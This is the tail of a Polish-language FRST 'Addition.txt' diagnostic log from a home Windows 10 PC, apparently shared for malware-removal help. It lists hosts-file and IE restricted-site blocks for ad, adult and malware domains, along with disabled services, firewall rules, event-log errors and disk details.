restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7896 witryn. IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\01i.info -> 01i.info IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\05p.com -> 05p.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\0calories.net -> 0calories.net IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\0cj.net -> 0cj.net IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\1-se.com -> 1-se.com Wykryto więcej niż wyliczono: 11433 witryn. ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2016-05-01 03:31 - 00452340 ____R C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 www.007guard.com 127.0.0.1 007guard.com 127.0.0.1 008i.com 127.0.0.1 www.008k.com 127.0.0.1 008k.com 127.0.0.1 www.00hq.com 127.0.0.1 00hq.com 127.0.0.1 010402.com 127.0.0.1 www.032439.com 127.0.0.1 032439.com 127.0.0.1 www.0scan.com 127.0.0.1 0scan.com 127.0.0.1 1000gratisproben.com 127.0.0.1 www.1000gratisproben.com 127.0.0.1 1001namen.com 127.0.0.1 www.1001namen.com 127.0.0.1 100888290cs.com 127.0.0.1 www.100888290cs.com 127.0.0.1 www.100sexlinks.com 127.0.0.1 100sexlinks.com 127.0.0.1 10sek.com 127.0.0.1 www.10sek.com 127.0.0.1 www.1-2005-search.com 127.0.0.1 1-2005-search.com 127.0.0.1 123fporn.info 127.0.0.1 www.123fporn.info 127.0.0.1 123haustiereundmehr.com 127.0.0.1 www.123haustiereundmehr.com 127.0.0.1 123moviedownload.com 127.0.0.1 www.123moviedownload.com Wykryto więcej niż wyliczono: 15518 linii. ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\tom615\Desktop\Tom i Avatary\Tapety\81fab001-c57d-4f19-ac63-f5e2788a05f7_57.jpg DNS Servers: 37.8.214.2 - 31.11.202.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Obecnie brak automatycznej naprawy dla tej sekcji.) MSCONFIG\Services: AdobeARMservice => 3 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: AdvancedSystemCareService9 => 2 MSCONFIG\Services: Disc Soft Lite Bus Service => 3 MSCONFIG\Services: GfExperienceService => 2 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: LiveUpdateSvc => 2 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: NvNetworkService => 2 MSCONFIG\Services: NvStreamNetworkSvc => 3 MSCONFIG\Services: NvStreamSvc => 2 MSCONFIG\Services: nvsvc => 2 MSCONFIG\Services: Origin Client Service => 3 MSCONFIG\Services: pproupd => 3 MSCONFIG\Services: QQPCRTP => 2 MSCONFIG\Services: QQRepairFixSVC => 2 MSCONFIG\Services: rowugoqo => 3 MSCONFIG\Services: sikerewizbt => 3 MSCONFIG\Services: SkypeUpdate => 3 MSCONFIG\Services: Spooler => 3 MSCONFIG\Services: Steam Client Service => 3 MSCONFIG\Services: Stereo Service => 2 MSCONFIG\Services: TabletInputService => 3 MSCONFIG\Services: TapiSrv => 3 MSCONFIG\Services: WinRM => 3 MSCONFIG\Services: WinSvces => 3 MSCONFIG\Services: WwanSvc => 3 MSCONFIG\startupreg: DAEMON Tools Lite Automount => "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun MSCONFIG\startupreg: GUDelayStartup => "C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe" -delayrun MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "Advanced SystemCare 9" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "ALLUpdate" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "ALLPlayer WiFi Remote" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "Napisy24Update" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808 FirewallRules: [{60243A81-80C0-4173-A4B4-29231C52371F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{9A16CB0D-0BF7-41ED-8515-373340CBCD3B}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{B11985D1-289D-42A2-AA76-BC79D89700B1}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{D9FCC24C-BAB7-4387-B9FE-4CFBE5E83835}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{AB40DE08-AD20-491C-9B2E-D4718EBC29C6}] => (Allow) C:\Users\tom615\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{25F47555-FE76-4F60-AF78-780023FF312B}] => (Allow) C:\Users\tom615\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{2807E67E-3E3F-4C63-B87C-E192CC2B5F09}] => (Allow) C:\Users\tom615\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{D25D5DD2-0C11-4D3F-8CDE-3CA5A9A3B03C}] => (Allow) C:\Users\tom615\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{1C91AB53-1C66-4F95-89D2-5CE0B3C437E0}] => (Allow) C:\Users\tom615\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{56806E86-FFEE-4162-815B-136450FD0BB4}] => (Allow) C:\Users\tom615\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{45F10604-8503-45BC-B528-F80B14329D04}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{95599DC6-7C48-4265-9C2F-571E6E6E8C1D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{1C03017A-0133-4385-B575-6A0E56756F06}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{8ADFDF7A-F67D-4281-AD18-50FFF9A5FC6B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{EF056561-0EF5-47EF-A4EE-91EABF446DEB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{8ACCA527-A8A0-4929-94FE-446E1355C10E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{2E9FC673-ACE7-4E23-B0C9-C4544FEF2AC2}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{F4851967-26D7-4FCF-AFB3-855B3FCC8307}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{724358BF-7384-404D-96D6-79AB0DFE2727}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [{D13D1F3E-E4A9-4BBE-96BB-F0D79246030C}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [TCP Query User{7C73656E-B646-42FA-8B2B-9F4ECDB5BCE8}G:\far cry 4 gold edition-skidrow i codex\bin\farcry4.exe] => (Block) G:\far cry 4 gold edition-skidrow i codex\bin\farcry4.exe FirewallRules: [UDP Query User{191F9431-AACE-49C4-940B-152FEA8DEE80}G:\far cry 4 gold edition-skidrow i codex\bin\farcry4.exe] => (Block) G:\far cry 4 gold edition-skidrow i codex\bin\farcry4.exe FirewallRules: [{F3A4C86B-3C0E-4A30-B536-5088003CB81F}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [{57056FCE-C30C-473C-BDB8-EA9282967030}] => (Allow) f:\Games\World_of_Tanks\WoTLauncher.exe FirewallRules: [{FF6118AB-D9D6-4695-9F1F-1B7CCE22873F}] => (Allow) f:\Games\World_of_Tanks\WoTLauncher.exe FirewallRules: [TCP Query User{225DF5F7-C265-4DD7-B927-40C4EA7CEAB1}F:\gry\dead space\dead space v1.0.0.222 pl [roka1969]\dead space.exe] => (Block) F:\gry\dead space\dead space v1.0.0.222 pl [roka1969]\dead space.exe FirewallRules: [UDP Query User{03FDF2A5-8364-4739-8041-F73AAC990AF6}F:\gry\dead space\dead space v1.0.0.222 pl [roka1969]\dead space.exe] => (Block) F:\gry\dead space\dead space v1.0.0.222 pl [roka1969]\dead space.exe FirewallRules: [{3B4E9F98-7732-462F-B495-99CC162BB917}] => (Allow) F:\Gry\Dead Space 3\deadspace3.exe FirewallRules: [{00ED70A2-2C74-4D29-A3CF-6992F3AF92B0}] => (Allow) F:\Gry\Dead Space 3\deadspace3.exe FirewallRules: [{035D88B9-78DA-4480-93E3-A647C327EF77}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [{C41BA3E7-24E2-42A8-9827-40482FA9B6E7}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [{7559E93D-7394-418D-BA43-4F1DC3310AEB}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [{5F895FFB-75C9-4B54-B128-7BA055EBA7CA}] => (Allow) C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe FirewallRules: [{C8E89654-1355-4F2B-8CB0-48243A2EF818}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [TCP Query User{2DB512FF-EE18-410B-8BE7-AF50744D76AA}C:\program files (x86)\allplayer remote\allplayerremotecontrol.exe] => (Allow) C:\program files (x86)\allplayer remote\allplayerremotecontrol.exe FirewallRules: [UDP Query User{56AC89A7-8158-4E2F-9B88-BE5435664444}C:\program files (x86)\allplayer remote\allplayerremotecontrol.exe] => (Allow) C:\program files (x86)\allplayer remote\allplayerremotecontrol.exe FirewallRules: [{1705EB5B-82C7-4C3E-9431-A2B97E2EC851}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe FirewallRules: [{E03151F4-6EAB-4C9B-870C-CED5B7A0920B}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service ==================== Punkty Przywracania systemu ========================= 28-04-2016 06:10:34 Zaplanowany punkt kontrolny 28-04-2016 11:15:30 Driver Booster : Java Runtime Environment 32 bit 30-04-2016 22:04:42 DLL-Files Fixer sob., kwi 30, 16 22:04 ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Główna kolejka wydruku Description: Lokalna kolejka wydruku Class Guid: {1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc} Manufacturer: Microsoft Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Stacja dyskietek Description: Stacja dyskietek Class Guid: {4d36e980-e325-11ce-bfc1-08002be10318} Manufacturer: (Standardowe sterowniki stacji dyskietek) Service: flpydisk Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/01/2016 09:32:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 09:25:09 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 09:25:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 09:14:10 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 09:14:00 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 09:13:35 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji Microsoft.Windows.Photos_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 09:02:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 08:32:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 08:17:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/01/2016 08:02:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: tom615-PC) Description: Aktywacja aplikacji Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927149. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Dziennik System: ============= Error: (05/01/2016 03:03:14 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa NetTcpActivator zależy od usługi NetTcpPortSharing, której nie można uruchomić z powodu następującego błędu: %%1058 Error: (05/01/2016 03:03:03 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa NcaSvc zależy od usługi iphlpsvc, której nie można uruchomić z powodu następującego błędu: %%1058 Error: (05/01/2016 03:02:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi luafv z powodu następującego błędu: %%1275 Error: (05/01/2016 03:01:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Dostęp do danych użytkownika_26d9e niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/01/2016 03:01:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Magazyn danych użytkownika_26d9e niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/01/2016 03:01:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Dane kontaktowe_26d9e niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/01/2016 03:01:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Synchronizuj hosta_26d9e niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/01/2016 02:49:29 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa SpyHunter 4 Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/01/2016 02:17:43 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa NetTcpActivator zależy od usługi NetTcpPortSharing, której nie można uruchomić z powodu następującego błędu: %%1058 Error: (05/01/2016 02:17:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa NcaSvc zależy od usługi iphlpsvc, której nie można uruchomić z powodu następującego błędu: %%1058 CodeIntegrity: =================================== Date: 2016-04-30 07:35:46.630 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-29 12:45:52.826 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-18 11:50:04.731 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-18 00:32:21.310 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-17 11:58:20.950 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Users\tom615\AppData\Local\Temp\ASC-6AD91510\setup32\vfdriver.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-04-17 04:00:38.502 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-13 22:45:36.703 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-13 21:16:55.691 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-11 08:39:04.100 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-04-11 08:23:43.265 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: AMD Athlon(tm) II X4 640 Processor Procent pamięci w użyciu: 35% Całkowita pamięć fizyczna: 4093.55 MB Dostępna pamięć fizyczna: 2659.75 MB Całkowita pamięć wirtualna: 19193.55 MB Dostępna pamięć wirtualna: 17568.58 MB ==================== Dyski ================================ Drive c: (Win 10) (Fixed) (Total:74.09 GB) (Free:15.3 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive d: () (Fixed) (Total:150 GB) (Free:149.57 GB) NTFS Drive e: () (Fixed) (Total:390.8 GB) (Free:341.78 GB) NTFS Drive f: () (Fixed) (Total:390.71 GB) (Free:360.61 GB) NTFS Drive h: () (Removable) (Total:1.87 GB) (Free:1.24 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 74.5 GB) (Disk ID: 88D7A686) Partition 1: (Active) - (Size=74.1 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=450 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8E778E77) Partition 1: (Active) - (Size=150 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=390.8 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=390.7 GB) - (Type=07 NTFS) ======================================================== Disk: 2 (Size: 1.9 GB) (Disk ID: 00000000) Partition: GPT. ==================== Koniec Addition.txt ============================